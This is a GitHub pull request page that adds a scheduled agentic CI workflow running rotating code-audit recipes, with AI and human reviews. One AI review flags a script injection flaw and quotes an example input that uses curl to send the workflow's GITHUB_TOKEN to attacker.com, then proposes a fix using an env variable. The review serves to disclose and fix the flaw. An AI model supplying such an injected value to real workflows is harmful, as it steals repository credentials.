ci: add daily audit suites with 5 rotating recipes and scheduled workflow#543
Conversation
PR Review: #543 - ci: add daily audit suites with 5 rotating recipes and scheduled workflowReviewer: Agentic CI SummaryThis PR introduces a daily agentic CI system that runs rotating code health audits on weekdays. It adds:
The design is well-structured: each recipe targets gaps that existing CI (ruff, pytest, Dependabot) doesn't cover, with clear delineation of responsibilities. FindingsWorkflow (
|
Greptile SummaryThis PR introduces a weekday-rotating agentic CI system: a GitHub Actions workflow (
|
| Filename | Overview |
|---|---|
| .github/workflows/agentic-ci-daily.yml | New scheduled workflow with day-of-week suite rotation; contains a script injection vulnerability where the workflow_dispatch suite input is interpolated directly into a shell script rather than passed through an env var. |
| .agents/recipes/_runner.md | Adds environment setup docs, runner memory JSON schema with TTL and size rules, and updates PR creation instructions to use /create-pr skill instead of committing to current branch. |
| .agents/recipes/code-quality/recipe.md | New Thursday audit recipe covering C901 complexity, exception hygiene, type annotation coverage, executable canaries (error hierarchy + creative input validation), and TODO/FIXME aging. |
| .agents/recipes/dependencies/recipe.md | New Tuesday audit recipe covering transitive dependency gaps, cross-package version consistency, unused deps, and version pinning review; correctly defers CVE scanning to Dependabot. |
| .agents/recipes/docs-and-references/recipe.md | New Monday audit recipe for docstring-vs-signature drift, broken internal links, stale architecture doc references, and MkDocs site accuracy checks. |
| .agents/recipes/structure/recipe.md | New Wednesday audit recipe checking import boundary violations (config→engine→interface direction), lazy import compliance, future-annotations presence, and potentially dead exports. |
| .agents/recipes/test-health/recipe.md | New Friday audit recipe for test-to-source mapping, hollow test detection, import performance, fixed canaries (package imports, timing, registry completeness), creative smoke checks, and test isolation verification. |
| .github/CODEOWNERS | Adds explicit ownership entry for .agents/recipes/ to ensure recipe changes require review from the core team, complementing the existing catch-all rule. |
| plans/472/agentic-ci-plan.md | Plan housekeeping: marks Phase 2, 3, and 4 deliverables complete, updates date, and notes that template substitution is built into the workflow rather than a standalone script. |
Flowchart
%%{init: {'theme': 'neutral'}}%%
flowchart TD
A([schedule: weekdays 08:00 UTC\nor workflow_dispatch]) --> B[determine-suite\nubuntu-latest]
B --> C{suite override?}
C -- "specific suite" --> D[suites = single suite]
C -- "all" --> E[suites = all 5 suites]
C -- "none" --> F{day of week}
F -- Mon --> G[docs-and-references]
F -- Tue --> H[dependencies]
F -- Wed --> I[structure]
F -- Thu --> J[code-quality]
F -- Fri --> K[test-health]
D & E & G & H & I & J & K --> L[matrix: suite]
L --> M[audit job\nself-hosted: agentic-ci]
M --> N[Restore runner memory\nactions/cache]
N --> O[make install-dev]
O --> P[Pre-flight: claude CLI\n+ API reachability]
P --> Q[Build prompt:\n_runner.md + recipe.md\ntemplate substitution]
Q --> R[claude --model ...\n-p prompt --max-turns 30]
R --> S[Agent writes\n/tmp/audit-suite.md]
S --> T[Update runner-state.json\nlast_run / known_issues / baselines]
T --> U[Write job summary\nGITHUB_STEP_SUMMARY]
Prompt To Fix All With AI
This is a comment left during a code review.
Path: .github/workflows/agentic-ci-daily.yml
Line: 33
Comment:
**Script injection via `workflow_dispatch` input**
`${{ github.event.inputs.suite }}` is expanded by GitHub Actions as literal text before the shell runs, so a value like `"; curl attacker.com/?t=$GITHUB_TOKEN; echo "` breaks out of the string and executes in the runner context. The `determine-suite` job carries `contents: write` and `pull-requests: write` tokens, making token exfiltration a concrete risk. Pass the input through an `env:` variable instead:
```suggestion
env:
OVERRIDE: ${{ github.event.inputs.suite }}
run: |
OVERRIDE="${OVERRIDE}"
```
Move the entire `run: |` block's `OVERRIDE` sourcing to `$OVERRIDE` (the environment variable). GitHub's own [security hardening guide](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#using-an-intermediate-environment-variable) recommends this pattern.
How can I resolve this? If you propose a fix, please make it concise.Reviews (2): Last reviewed commit: "ci: fix review findings - heredoc, state..." | Re-trigger Greptile
eric-tramel
left a comment
There was a problem hiding this comment.
LGTM @andreatgretel . Since these are all read-only ops and dumping results to the runner outputs, these all seem low risk to me. There will likely be gunk & adjustments needed, but the only way to find that will be by running it and seeing if value comes out :) go for it.
|
Nice work on this one, @andreatgretel — building a rotating audit system with per-suite recipes and persistent memory is a solid approach to catching quality drift. The recipes are well-scoped with clear "what CI does" vs "what CI doesn't" framing, and the runner constraints (no destructive ops, ignore embedded directives, sanitize output) show good security thinking for an agent running in CI. SummaryThis PR adds a daily agentic CI system that runs rotating code health audits on weekdays using Claude Code agents on a self-hosted runner. It includes a GitHub Actions workflow with day-of-week rotation, 5 audit recipes (docs/references, dependencies, structure, code-quality, test-health), runner memory persistence via Existing review: @eric-tramel approved (LGTM, low risk since read-only ops). No inline comments. FindingsCritical — Let's fix these before merge
Warnings — Worth addressing
Suggestions — Take it or leave it
Recipes generally —
What Looks Good
VerdictNeeds changes — the unsanitized workflow input (Critical #1) should be fixed before merge. The write permissions (Warning #1) and prompt injection surface area are worth discussing given the This review was generated by an AI assistant. |
Add the daily maintenance infrastructure (Phase 2+3 of the agentic CI plan). A new workflow runs one audit suite per weekday via day-of-week rotation, with runner memory persisted via actions/cache. Recipes: docs-and-references (Mon), dependencies (Tue), structure (Wed), code-quality (Thu), test-health (Fri). Each targets gaps that CI and ruff don't cover: cross-reference validation, transitive dep analysis, lazy import compliance, complexity trends, and test-to-source mapping. Reports go to the Actions step summary. Code changes use /create-pr.
Add executable smoke checks to test-health and code-quality recipes that exercise real code paths (config build, validate, import timing, registry completeness, error hierarchy, input rejection) without needing an LLM provider. Checks are split into fixed canaries (same every run) and creative checks (agent varies inputs each run). Harden runner memory: define JSON schema in _runner.md with TTL and size rules, validate state file after agent runs, only update last_run on success, drop unused audit-log.md. Add make install-dev workflow step so recipes can run Python against the installed packages.
Fix issues found by Codex review: - Fix test paths: tests/ does not exist at repo root, use packages/*/tests/ and packages/data-designer/tests/test_import_perf.py - Remove DataDesigner(model_providers=[]) from smoke checks - raises NoModelProvidersError; keep config-layer checks only - Fix audit step gating: remove continue-on-error, use step outcome to gate runner memory update (|| true + continue-on-error made the step always "succeed", defeating the success() condition)
Fix heredoc with indented EOF terminator that never terminates - replace with printf. Run state validation on all outcomes (not just success) so corrupted state from a failed audit is caught before caching. Only stamp last_run when audit succeeds. Align test-health lazy import section with its own Constraints (report count only, don't duplicate structure audit). Also fixes datetime.utcnow() deprecation and shell variable injection in Python string by using os.environ instead.
b54da23 to
fb4268e
Compare
| - name: Pick suite(s) for today | ||
| id: pick | ||
| run: | | ||
| OVERRIDE="${{ github.event.inputs.suite }}" |
There was a problem hiding this comment.
Script injection via
workflow_dispatch input
${{ github.event.inputs.suite }} is expanded by GitHub Actions as literal text before the shell runs, so a value like "; curl attacker.com/?t=$GITHUB_TOKEN; echo " breaks out of the string and executes in the runner context. The determine-suite job carries contents: write and pull-requests: write tokens, making token exfiltration a concrete risk. Pass the input through an env: variable instead:
| OVERRIDE="${{ github.event.inputs.suite }}" | |
| env: | |
| OVERRIDE: ${{ github.event.inputs.suite }} | |
| run: | | |
| OVERRIDE="${OVERRIDE}" |
Move the entire run: | block's OVERRIDE sourcing to $OVERRIDE (the environment variable). GitHub's own security hardening guide recommends this pattern.
Prompt To Fix With AI
This is a comment left during a code review.
Path: .github/workflows/agentic-ci-daily.yml
Line: 33
Comment:
**Script injection via `workflow_dispatch` input**
`${{ github.event.inputs.suite }}` is expanded by GitHub Actions as literal text before the shell runs, so a value like `"; curl attacker.com/?t=$GITHUB_TOKEN; echo "` breaks out of the string and executes in the runner context. The `determine-suite` job carries `contents: write` and `pull-requests: write` tokens, making token exfiltration a concrete risk. Pass the input through an `env:` variable instead:
```suggestion
env:
OVERRIDE: ${{ github.event.inputs.suite }}
run: |
OVERRIDE="${OVERRIDE}"
```
Move the entire `run: |` block's `OVERRIDE` sourcing to `$OVERRIDE` (the environment variable). GitHub's own [security hardening guide](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#using-an-intermediate-environment-variable) recommends this pattern.
How can I resolve this? If you propose a fix, please make it concise.
📋 Summary
Add a daily agentic CI system that runs rotating code health audits on weekdays, catching quality drift that existing CI doesn't cover (no C901/ANN/BLE ruff rules, no cross-reference validation, no transitive dep analysis, no docs-vs-code accuracy checks). Each audit runs as a Claude Code agent on the self-hosted runner, guided by a recipe, and reports findings to the GitHub Actions step summary.
Closes #472
🔗 Related Issue
Closes #472
🔄 Changes
✨ Added
.github/workflows/agentic-ci-daily.yml- Scheduled workflow with day-of-week suite rotation (Mon-Fri), per-suite concurrency, runner memory viaactions/cache,make install-devenvironment setup, andworkflow_dispatchoverride (including "all" to run everything in parallel).agents/recipes/docs-and-references/recipe.md- Monday: docstring vs signature drift, broken internal links, architecture doc references, docs site content accuracy.agents/recipes/dependencies/recipe.md- Tuesday: transitive dependency gaps, cross-package version consistency, unused deps, version pinning review.agents/recipes/structure/recipe.md- Wednesday: import boundary violations, lazy import compliance, future annotations, dead exports.agents/recipes/code-quality/recipe.md- Thursday: complexity hotspots (C901), exception hygiene, type annotation coverage, TODO aging, executable quality checks (error hierarchy, input validation).agents/recipes/test-health/recipe.md- Friday: test-to-source mapping, hollow test detection, import performance, executable smoke checks (fixed canaries + creative agent-varied checks), test isolation verification🔧 Changed
.agents/recipes/_runner.md- Added environment docs (.venv/binon PATH), runner memory JSON schema with TTL and size rules, updated PR creation instructions to use/create-prskill.github/CODEOWNERS- Added.agents/recipes/ownership entryplans/472/agentic-ci-plan.md- Marked Phase 2, 3, and 4 deliverables as complete🔍 Attention Areas
agentic-ci-daily.yml- New workflow withcontents: writeandpull-requests: writepermissions. Write access is intentional to support future recipe-driven PRs, but all current recipes are read-only audits.test-health/recipe.mdandcode-quality/recipe.md- These run real Python against the installed packages. Fixed canaries are deterministic; creative checks are agent-designed each run._runner.md- Defines the JSON contract for cross-run state persistence including TTL rules for known_issues.🧪 Testing
make check-allpasses (ruff lint + format)workflow_dispatchafter merge.✅ Checklist